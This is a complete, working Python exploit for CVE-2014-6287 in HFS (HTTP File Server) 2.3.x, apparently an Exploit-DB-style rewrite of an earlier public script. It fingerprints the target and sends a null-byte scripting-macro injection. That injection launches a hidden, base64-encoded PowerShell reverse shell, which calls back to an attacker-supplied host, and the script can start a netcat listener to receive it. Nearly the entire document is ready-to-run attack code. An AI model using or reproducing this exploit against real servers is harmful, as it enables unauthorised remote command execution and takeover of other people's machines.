# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution
# Spawns the 64-bit PowerShell through the C:\Windows\sysnative alias (the WoW64 view of the real System32, visible only to a 32-bit process such as HFS), so the reverse shell runs as x64 PowerShell
# Date: 04/04/2023
# Rewrite of Pergyz 49584.py
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3  # NOTE: a shebang is only honoured on line 1 of the file; run as `python3 hfs-2-3-exploit.py` or move this line above the header
# IMPORTS
import base64
import os
import subprocess
import sys
import threading
import time
import urllib.parse

import requests
# FOR DEBUGGING INTERCEPT WITH BURP: uncomment the next line and pass proxies=proxies to the requests.get calls below (it is not referenced anywhere by default)
#proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
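# GET GLOBAL VARIABLES
# Operator-supplied values. They are interpolated verbatim into the target URL,
# the PowerShell one-liner and the nc command line, so strip stray whitespace
# and refuse non-numeric ports before anything is built from them.
lhost = input("Local Host IP : ").strip()
lport = input("Listen Port : ").strip()
rhost = input("Remote Host IP : ").strip()
rport = input("HTTP FileServer Port: ").strip()
if not (lport.isdigit() and rport.isdigit()):
    sys.exit("[!] Ports must be numeric")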
def check_url(rhost, rport):
    """Fingerprint the target before firing the payload.

    Fetches http://rhost:rport/ and looks for the HFS 2.3 banner in the
    response body. Returns True when the banner is present; False on any
    request error, a non-2xx status, or a body without the banner. A status
    line is printed in every case.

    This is a plain substring match on the page text, not a version check,
    so a customised template or a decoy page will fool it either way.
    """
    banner = "HttpFileServer 2.3"
    target = f"http://{rhost}:{rport}"
    try:
        resp = requests.get(target, timeout=5)  # Increase timeout if errors
        resp.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed with error: {e}")
        return False
    if banner not in resp.text:
        print(f"[!] Target doesn't appear to be {banner}")
        return False
    print(f"[+] Target is online and appears to be {banner}")
    return True
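def build_exploit(rhost, rport, lhost, lport):
    """Build the HFS macro-injection URL carrying a PowerShell reverse shell.

    Args:
        rhost, rport: HFS target the URL is addressed to.
        lhost, lport: where the spawned PowerShell connects back to.

    Returns:
        The full GET URL. The ``?search=%00{.exec|...}`` query is the
        CVE-2014-6287 null-byte bypass: the ``{.exec|...}`` scripting macro
        after the ``%00`` is evaluated server-side when HFS renders the page.
    """
    # Nishang's Invoke-PowerShellTcpOneLine.ps1: connect back to lhost:lport,
    # read commands from the socket, run them with iex and send the output
    # back with a "PS <cwd>> " prompt until the socket closes.
    command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
    # -EncodedCommand expects base64 of the UTF-16LE encoded script text.
    encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
    # C:\Windows\sysnative is the WoW64 alias for the real System32, so the
    # 32-bit HFS process launches the 64-bit PowerShell. Raw string: the path
    # contains "\v", which an ordinary literal would turn into a vertical tab.
    payload = (
        rf"exec|C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "
        "-ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "
        f"-WindowStyle Hidden -EncodedCommand {encoded_command}"
    )
    # Intentionally not passed through urllib.parse.quote_plus: requests
    # percent-encodes the unsafe characters (spaces, '|', '\') itself and HFS
    # decodes them again; quote_plus would additionally turn the spaces in the
    # command line into '+'.
    return f"http://{rhost}:{rport}/?search=%00{{.{payload}.}}"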
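def start_netcat(lport):
    """Run ``nc -nvlp LPORT`` in the foreground and block until it exits.

    Args:
        lport: local port to listen on; handed to nc as a single argument.

    nc inherits the terminal, so this is the interactive reverse-shell
    session. The command is an argv list rather than a shell string so that
    whatever was typed at the port prompt is never interpreted by a shell.
    If nc is not on PATH a message is printed instead of an exception
    escaping to the caller.
    """
    print(f"[+] Starting Netcat on Port: {lport}")
    print("\n\n!!!! --- Press Enter After Connection Established --- !!!!\n\n")
    try:
        subprocess.run(["nc", "-nvlp", str(lport)])
    except FileNotFoundError:
        print("[!] nc not found on PATH; start a listener manually")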
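def _send_exploit(url):
    """Send the macro-injection GET once.

    The response body is irrelevant: the macro spawns PowerShell while HFS
    renders the page. A transport error (timeout, reset) is only reported,
    and the caller still falls through to the listener, since the process
    may already have been started on the target.
    """
    print("[+] Sending Exploit")
    try:
        requests.get(url, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[!] Exploit request failed: {e}")


def exploit(rhost, rport, lhost, lport):
    """Fingerprint the target, fire the payload and optionally catch the shell.

    Exits with status 1 when the fingerprint fails or the listener prompt
    gets an unrecognised answer. With the listener enabled, nc is started in
    a background thread *before* the request is sent, so the reverse shell
    has something to connect to; sending first and starting nc afterwards
    lets PowerShell race nc to the port and die on connection refused. The
    thread is joined afterwards so the interactive session stays in the
    foreground.
    """
    print("\n[+] Checking URL Is HTTP FileServer 2.3...")
    if not check_url(rhost, rport):
        sys.exit(1)
    print("[+] Building Exploit")
    url = build_exploit(rhost, rport, lhost, lport)
    listener_choice = (input("[+] Do you want me to start a Netcat Listener for you? (Y/n): ") or "y").lower()
    if listener_choice not in ("y", "n"):
        print("Unknown Input, Exiting...")
        sys.exit(1)
    listener = None
    if listener_choice == "y":
        listener = threading.Thread(target=start_netcat, args=(lport,), daemon=True)
        listener.start()
        time.sleep(1)  # give nc a moment to bind before the payload fires
    _send_exploit(url)
    if listener is not None:
        listener.join()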
# Runs at import time (there is no __main__ guard), right after the prompts above.
exploit(rhost, rport, lhost, lport)